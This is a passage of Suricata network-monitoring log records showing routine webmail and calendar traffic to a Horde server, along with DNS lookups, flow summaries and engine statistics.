Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":1}} {"timestamp":"2020-02-29T00:12:50.000580+0000","flow_id":1914802374239664,"event_type":"flow","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:48.976304+0000","end":"2020-02-29T00:07:49.084348+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:50.097220+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":6}} {"timestamp":"2020-02-29T00:12:50.110860+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3298,"tx_id":15}} {"timestamp":"2020-02-29T00:12:50.949751+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47381,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:50.954845+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820}} {"timestamp":"2020-02-29T00:12:51.000251+0000","event_type":"stats","stats":{"uptime":14423,"capture":{"kernel_packets":135307,"kernel_drops":0},"decoder":{"pkts":135315,"bytes":93285532,"invalid":187,"ipv4":133822,"ipv6":8,"ethernet":135315,"raw":0,"null":0,"sll":0,"tcp":128534,"udp":5086,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2764,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2780,"synack":2771,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1803,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2323,"failed_udp":111},"tx":{"http":4654,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2403}},"flow_mgr":{"closed_pruned":2742,"new_pruned":15,"est_pruned":2367,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22738,"memcap_state":0,"memcap_global":0},"http":{"memuse":101791,"memcap":0}}} {"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":109,"tx_id":0}} {"timestamp":"2020-02-29T00:12:51.118278+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38583,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:51.150847+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/redbox_spinner.gif","state":"CLOSED","stored":false,"size":6820,"tx_id":0}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:12:52.000314+0000","flow_id":872744524144809,"event_type":"flow","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.417961+0000","end":"2020-02-29T00:07:51.525948+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:53.000241+0000","flow_id":859382880918804,"event_type":"flow","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.908564+0000","end":"2020-02-29T00:07:52.016611+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:56.090899+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":492,"tx_id":0}} {"timestamp":"2020-02-29T00:12:56.254011+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":128,"tx_id":1}} {"timestamp":"2020-02-29T00:12:58.000240+0000","event_type":"stats","stats":{"uptime":14430,"capture":{"kernel_packets":135364,"kernel_drops":0},"decoder":{"pkts":135370,"bytes":93299408,"invalid":187,"ipv4":133875,"ipv6":8,"ethernet":135370,"raw":0,"null":0,"sll":0,"tcp":128583,"udp":5090,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2766,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2782,"synack":2773,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1805,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2325,"failed_udp":111},"tx":{"http":4657,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2405}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2370,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":58099,"memcap":0}}} {"timestamp":"2020-02-29T00:12:59.579081+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43294,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:03.000496+0000","flow_id":1012670264431159,"event_type":"flow","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:02.053815+0000","end":"2020-02-29T00:08:02.162101+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:04.756758+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":210,"tx_id":0}} {"timestamp":"2020-02-29T00:13:05.000299+0000","event_type":"stats","stats":{"uptime":14437,"capture":{"kernel_packets":135371,"kernel_drops":0},"decoder":{"pkts":135379,"bytes":93301537,"invalid":187,"ipv4":133884,"ipv6":8,"ethernet":135379,"raw":0,"null":0,"sll":0,"tcp":128590,"udp":5092,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2767,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2783,"synack":2774,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1806,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2326,"failed_udp":111},"tx":{"http":4658,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2406}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2371,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":1,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22477,"memcap_state":0,"memcap_global":0},"http":{"memuse":58179,"memcap":0}}} {"timestamp":"2020-02-29T00:13:07.308166+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64728,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:07.606223+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919}} {"timestamp":"2020-02-29T00:13:08.000485+0000","flow_id":299443715105269,"event_type":"flow","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":9,"bytes_toserver":1312,"bytes_toclient":3258,"start":"2020-02-29T00:11:48.188917+0000","end":"2020-02-29T00:11:58.329407+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:09.000397+0000","flow_id":739926956553289,"event_type":"flow","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:07.963657+0000","end":"2020-02-29T00:08:08.072093+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:09.001174+0000","flow_id":483732157340798,"event_type":"flow","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:07.957566+0000","end":"2020-02-29T00:08:08.066104+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:10.166487+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:13:10.177839+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54470,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.362060+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:13:10.588089+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:13:10.603094+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12091,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.769376+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40263,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 